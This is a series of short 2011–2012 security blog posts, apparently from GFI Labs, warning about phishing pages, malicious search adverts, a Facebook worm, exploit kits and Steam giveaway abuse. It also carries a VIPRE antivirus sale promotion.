2012-01-16T01:33:33.032-05:00Yes, we are :)
2012-01-12T03:59:51.336-05:00United States Computer Emergency Readiness Team (simply known as US-CERT) is the latest bait phishers used to get users to install malware on user systems.
2012-01-12T00:00:40.695-05:00allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/WkWpx6bi0a8" width="500">
2012-01-11T10:24:30.635-05:00In a recent release of GFI Software's VIPRE report, GFI Labs revealed that recycled tactics from cybercriminals will not cease this new year. Modifications on these tactics will only be slight, and will depend greatly on the kind of targets these online criminals are aiming at. To quote Senior Threat Researcher Christopher Boyd: "Most cyber-attacks at any given time rely on old techniques deployed with a new disguise. The reason we see them again and again is quite simply because they work, and we anticipate 2012 to bring many fresh takes on old scams."
2012-01-11T01:07:22.390-05:00Matthew, one of our malware researchers at the AV Labs, came upon a MediaFire link on a YouTube account that purports to direct users to a site where a crack code for the video game Pro Evolution Soccer 2012 (PES 2012) (otherwise known as World Soccer: Winning Eleven 2012) can be downloaded.
2012-01-04T03:53:23.397-05:00CommTouch, an Internet security service provider, has recently released their Internet Threats Trend Report for 2011. In this report, they have highlighted and analyzed the various threats on Facebook that had plagued users for the past year, such as social engineering ploys and common methods of attack used. They also identify three ways on how criminals gain and what these are for targeting Facebook users. CommTouch provided an infographic (below) to showcase their analysis in a more coherent format.
2012-01-01T21:17:47.227-05:00"It's fine, trust me. I've done this stuff for a while now." Famous last words.
2011-12-30T05:40:23.936-05:00The rather awesome Steam gaming platform has a festive competition running at the moment - perform certain tasks in a selection of games drawn each day (or sign up to a few non gaming activities like join a forum, or link your Steam and Facebook accounts) and receive a free random gift. I have to admit - I'm not doing very well so far.Click to EnlargeThat gift could be a redeemable coupon for a free game, a discount or...a lump of coal. All is not lost should you be handed a lump of coal - collect seven, and you can craft it into another randomly selected discount or free game.Click to EnlargeThis is, of course, where it all goes horribly wrong.1) Gamers are exploiting the various "Indie Bundle" packs that go on sale periodically. This particular gaming bundle is a "pay what you want" affair, typically stuffed full of great games and additional offers should you pay a little extra (we still need to have that talk, Windows users). The latest Humble Indie Bundle went live not so long ago, and in a mad dash to create as much coal as possible to increase the chances of free games in Steam gamers were paying the base amount for Indie Bundles, redeemable against Steam accounts.From Platform Nation: "For just 1 penny you can nab yourself a Steam redeemable key, and make your account valid for entry in the Epic Giveaway and the freebie prizes. That means you can create 100 accounts for just $1"Whoops. They must have really gone to town on that one, given that the mass purchasing caused the price of the bundle to drop by more than 25 cents.Greedy gamers have also been targeting the "IndieGala Bundle" which gives a separate Steam account for each game - effectively five duplicate accounts for the lowest potential price of a penny. Once you've got your hands on all those wonderful discount coupons and free games, you can potentially gift them to your "main" account and sit upon a throne of murkily acquired titles.2) With shades of Xbox achievement tampering, people are distributing save files / text files to unlock Steam game achievements needed to win coal / coupons. Here's an example of someone loading up a file not belonging to them, nabbing the required achievement in Binding of Isaac and getting their hands on a free game. That's kind of dreadful, and by "kind of" I mean "completely".3) Gamers are firing up a Steam achievements modding tool, to ensure they nab as much coal as possible.Click to EnlargeHere's someone who clearly went on an "unlock all the things" rampage. As you can imagine, these antics are not proving popular with non cheating gamers.Coal farming isn't going unpunished, and Valve are starting to clamp down on anyone seen to be farming and / or exploiting. You may well be seeing many more examples like the below on forums posted up by vaguely annoyed gamers who want their accounts reactivated:Click to EnlargeIf Valve catch you being naughty this festive season, they won't even leave you with coal. Top that, Santa...Christopher Boyd[...]
2011-12-22T01:50:12.842-05:00It's not long since The Hobbit trailer made a lot of people very excited, and already we're seeing fake claims of "watch this movie online" leading to surveys.
2011-12-20T06:53:52.643-05:00Robert Stetson, one of our malware researchers at the AV Labs, found a new phishing scam in the wild.
2011-12-16T10:26:08.513-05:00This social media "stalking" thing, to the best of my knowledge, all began on MySpace. We've seen them emerge on Twitter, too: our friends at Sophos wrote a so-called "app" that Twitter purportedly released to track a user's stalker. Only this time, no such app is ever involved.click to enlargeWe've seen the tweet above pointing users to the URL, canbin(dot)ru—a domain created just late last month. Once users click it, they are then directed to twvitter(dot)com/user_login-sessions/?timed_out=1. It's a phishing page.click to enlargeThere are two things we can take note from it: (1) the URL, which clearly tries to play tricks with our eyes (much like this one), and (2) the purported Twitter session that has timed out. Naturally, if one is logged onto Twitter and sees the message, they'll wonder for a second, and then unknowingly key in their user name and password anyway. Perhaps the only "error" we can see in this attack is that the site attempts to access the actual Twitter site the same way a real third-party app or site would to make everything seem legit. However, Twitter requires tokens from such apps and sites. Since we know that this is a bogus page, it doesn't have a token; thus, it can't successfully redirect users to their actual accounts as it was supposed to.click to enlargeWe impore you, Dear Reader, to please exercise caution when clicking links on tweets. Even better: use your better judgment on whether you'd believe a supposedly interesting tweet or not before considering visiting the URL that goes with it. More often than not, scam tweets are designed to sound this way to actually make Internet users click them. Please don't be fooled. Just like the "Girl Killed Herself" scam that made rounds within Twitter not so long ago, this, too, will probably go down in history as a classic attack involving two social networking giants. This is not a comforting news. As long as user continue to fall for scams, they will just keep coming.Jovi Umawing (Thanks to Chris for spotting this)[...]
2011-12-14T06:19:27.421-05:00For the lot of us who rely on the Internet to get news updates, we are made familiar with Distributed Denial of System (DDoS) attacks. Anonymous being on the headlines continuously for months made this kind of online crime conspicuous, even ushering it unexpectedly to the realm of mainstream.
2011-12-13T13:47:33.293-05:00I'm a big fan of Adblock Plus - it's a great add on if you don't want to be hit over the head with any number of spinning, flashing adverts torn straight from the pages of Dante.However, an interesting change has been made to the program with the release of 2.0 and some users are up in arms about it:Click to Enlarge"Adblock Plus has also been configured to allow non-intrusive advertising. You can change this selection at any time in the filter preferences."Blasphemy? Madness? Sparta? Who knows, but we now have a situation where users aren't happy about the opt in by default setting, or indeed approving adverts in general no matter how limited the scope. There's a page on the Adblock Plus site that outlines some of the reasons for this change:"You can allow some of the advertising that is considered not annoying. By doing this you support websites that rely on advertising but choose to do it in a non-intrusive way...In the long term the web will become a better place for everybody, not only Adblock Plus users. Without this feature we run the danger that increasing Adblock Plus usage will make small websites unsustainable."As for why this is set live by default:"If we ask users to enable this feature then most of them won't do it — simply because they never change any settings unless absolutely necessary. However, advertisers will only be interested in switching to better ways of advertising if the majority of Adblock Plus users has this feature enabled."I'm not entirely convinced that advertisers so fond of flashy, spinning adverts from the back of beyond will tone their adverts down just because of this move - and hey, let's not forget that adverts meeting the requirements to be potentially given the green light ("static ads, text only, no attention grabbing images") can be just as dangerous if not more so than the flashy horrors still on the blocklist.One good thing that may come out of this move is a possible reduction in infections. No really, hear me out. I know a lot of people who have told me they never installed Adblock Plus or similar programs because their income was primarily driven by dedicated communities, and they wanted to put something back into those communities by not blocking their (static) advertisements. For example, a professional comic artist or writer is supported by their community; as a thank you, they won't block the adverts on the sites belonging to their fans or webcomic rings.As a result, quite a few of them were hit by drive by installs and exploits while browsing the web with no ad blockers in place.If the Adblock Plus team do a good job of this, it might actually encourage more people to now try the program and let a few (hopefully harmless) adverts through while using their new found installs to block malicious adverts elsewhere with a clean conscience.That can only be a good thing. However, much will depend on their examination of the approved advert networks, their advertising methods, the kind of links those advertisers allow (and how they react to the bad apples that slip through the net) and whether or not the userbase approves of the opt in by default setup.We'll have to wait and see how this one plays out...Christopher Boyd[...]
2011-12-13T10:14:35.402-05:00Last week, our friends at ThreatPost posted about the ever-growing infection of websites hosting Black Hole Exploit Kits. A Black Hole exploit takes advantage of unpatched Windows operating systems. It also targets other software, such as Java and Adobe Reader, that can be installed on Windows platforms, which are a lot. Since the kits are already available in the black market (for free), we can only expect more infections and news surrounding this particular kit.
2011-12-09T12:11:28.123-05:00Another round of bad ads in Bing and Yahoo search are making an unwelcome return. Bing has fake Firefox adverts: Click to Enlarge Click to EnlargeYahoo has fake Adobe Flash adverts instead, located at gripwise(dot)com(dot)au/player/: Click to Enlarge Click to EnlargeAs you can see from the below screenshot, the Gripwise URL where this is located appears to have been compromised: Click to EnlargeBoth sites will give you the Privacy Protection rogue, and the domain used for the fake Firefox download (ipropertyoffice(dot)com) has active exploits so please steer clear. VirusTotal scores weigh in at 17/43, and we detect as Win32.Malware!Drop.Click to EnlargeAt time of writing, Microsoft have been notified and have said the adverts have been pulled. All the same, be very careful when clicking on sponsored adverts for common downloads such as Firefox, Flash and others. As we've seen time and time again, scammers are all too eager to push malicious files on unsuspecting users.Christopher Boyd (Thanks Matthew)[...]
2011-12-07T20:24:41.449-05:00Our monthly Top Ten threat detection report for the month of November is now available to take a look at, along with information on some of the scams we've seen these past few weeks including emails tempting users with infected PDF files, food stamp shenanigans involving mobile phone services and phishing emails containing HTML form attachments, some of which are still doing the rounds.
2011-12-07T20:08:12.962-05:00If you see an email arrive in your mailbox with the above title, feel free to discard it - nothing good will come of it, unless your idea of "good" is "filling in all of your personal information into a fake banking webpage then sending it to a scammer."
2011-12-05T10:05:26.348-05:00Here's a rather amateur phish targeting Steam users, located at steambirthday(dot)com. No birthday prizes for guessing what this scam is all about:
2011-11-29T05:40:18.935-05:00Our friends at CSIS, a Danish security company, has spotted a worm spreading within the Facebook platform. In a recent news article penned by Peter Kruse, the worm is said to be "a classic" one in terms of how it infects Internet users: uses stolen credentials to log in to Facebook accounts and then spam contacts. The message is said to contain a link to a file purporting to be an image—Screenshot of the file shows it has a .JPG extension—but it's actually a malicious screensaver. Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems.
2011-11-28T17:48:11.449-05:00Patrick, our resident rogue AV expert from the AV Labs, have his eyes set on one particular family—FakeScanti. This rogue family first appeared in the first quarter of 2010, and it has been within the radar ever since.
2011-11-28T11:05:31.191-05:00A company who make installers distributing the software of third parties recently contacted us to query a detection. As it turns out, their installer was not the problem - they were partnering with a company whose toolbar continues to have a history of misleading and deceptive installs.The interesting part of all this was the discussion over how the programs caught the attention of the end-user in the first place. Here, it was big green download buttons on download sites that looked (for all intents and purposes) like the button the end-user should click on to begin their desired download. Instead, it would take them to vaguely named installer files. Examples of said buttons: Click to EnlargeClick to EnlargeAs a response, the basic argument set forth was "We want to be clean, but it's so difficult when everybody else is doing whatever they can to snag an install over a company attempting to play by the rules". On the surface of it, this would seem to be the case - pre ticked checkboxes, dubious installers and poor notification inside the programs we download are bad enough, but poor choice of advert placement (and adverts that themselves look like Facebook notification prompts and other elements that would fool a regular web-user) muddy the waters still further.You can see these on everything from search engines to garden variety adverts on any number of websites you care to mention, and as social networks continue to grow in influence so too do 2.0 themed adverts continue to vie for your attention.Disappointingly, the bulk of the case set forth boils down to "everyone else is doing it". Here are some of the examples they sent over: Click to EnlargeAbove you can see a rather large green tick and a "Download now" button which completely overwhelm the simple text link that happens to be the one the end-user is looking for. Click to EnlargeThe above example has a rather prominent (and unrelated) download banner at the top and another download link off to the right - personally I don't feel this has as strong a case as the first example, although three green download buttons on the same page is always going to cause confusion for somebody.Click to EnlargeAbove, we can see the actual download button fairly dwarfed by a larger one off to the right. Much like the other two, you can bet this has resulted in a number of "Wait, what?" style downloads.None of this is new, of course - you can easily jump back to 2008 or earlier and see the same sort of thing taking place on Facebook application installer pages. It's worthwhile advising relatives you suspect will wander into these setups to be on their guard, because as far as many companies out there installing Adware and other products are concerned it's a case of Così fan tutte.Christopher Boyd (Thanks Eric)[...]
2011-11-24T11:42:59.403-05:00We've seen it here first: YapBrowser has risen after being declared dead five years ago—and this discovery is by Chris Boyd himself just a day before he presented at VB 2011 to discuss about rogue browsers, of which YapBrowser is.
2011-11-23T21:00:16.191-05:00Over the previous few days, our research team here at GFI has noticed an uptick in bank phishes winding up in a few of our spam traps. This particular scam is unique in that it comes with an html file attachment which leads to a form that attempts to steal from the unsuspecting victim all types of identifying information from the standard pin and password to their Driver’s License number and even a (fake) description of the last transaction made on the account.
Here at GFI, we’re dedicated to providing quality antivirus software at exceptional values, and this Black Friday is no exception. Our Black Friday Sale features the biggest discounts of 2011 – up to 75% off.
Black Friday Sale
VIPRE Antivirus 2012 for $39.95 NOW $9.95!
VIPRE Internet Security 2012 for $49.95 NOW $19.95!
With prices this low, you can give the gift of PC security to Grandma, your sister, even that crazy uncle. Is Santa bringing a new laptop this year? Make sure he installs VIPRE on it first! It defends against viruses, worms, spyware, Trojans, rootkits and other Internet threats without slowing down your new (or old) PCs. The VIPRE 2012 editions feature the latest threat definitions and are easier to install and use than ever before.
This weekend’s VIPRE Black Friday Sale makes it easy and affordable to keep your family safe online this holiday season (and in years to come). So take advantage of the lowest prices of 2011 while the deals last.
2011-11-22T07:13:34.369-05:00Way back in 2009, Sophos covered a bit of viral "fun" on Twitter where users of that service revealed their "porn star name" - comprised of your "first pet" and your "first street".